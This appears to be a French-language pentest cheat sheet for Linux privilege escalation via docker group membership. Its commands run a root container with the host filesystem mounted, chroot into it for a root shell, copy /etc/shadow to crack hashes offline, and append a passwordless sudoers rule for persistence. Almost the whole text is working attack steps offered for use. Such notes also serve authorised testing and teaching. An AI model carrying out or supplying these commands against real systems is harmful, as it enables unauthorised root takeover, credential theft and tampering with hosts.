idDescription: Vérifier si docker est dans les groupes actifs de la session.
Privesc Linux
Utilisateur dans le groupe docker : monter / dans un container root, chroot, game over.
idDescription: Vérifier si docker est dans les groupes actifs de la session.
groupsDescription: Liste des groupes de l'utilisateur, chercher docker dedans.
newgrp dockerDescription: Activer le groupe docker dans la session courante sans se reconnecter.
docker psDescription: Vérifier que docker est fonctionnel et lister les containers en cours.
docker imagesDescription: Lister les images disponibles localement pour réutiliser une existante.
docker run --rm -it -u 0 --entrypoint sh -v /:/mnt $IMAGEDescription: Lancer un container en root (-u 0) avec le FS host monté sous /mnt. Remplacer $IMAGE par une image déjà présente sur la machine.
chroot /mnt shDescription: Depuis l'intérieur du container, chroot vers le FS host pour obtenir un shell root réel.
cp /mnt/etc/shadow /tmp/shadow && cat /tmp/shadowDescription: Exfiltrer /etc/shadow via le montage pour cracker les hashes offline.
echo '$USER ALL=(ALL) NOPASSWD:ALL' >> /mnt/etc/sudoersDescription: Injecter une règle sudoers pour obtenir sudo sans mot de passe sur l'hôte.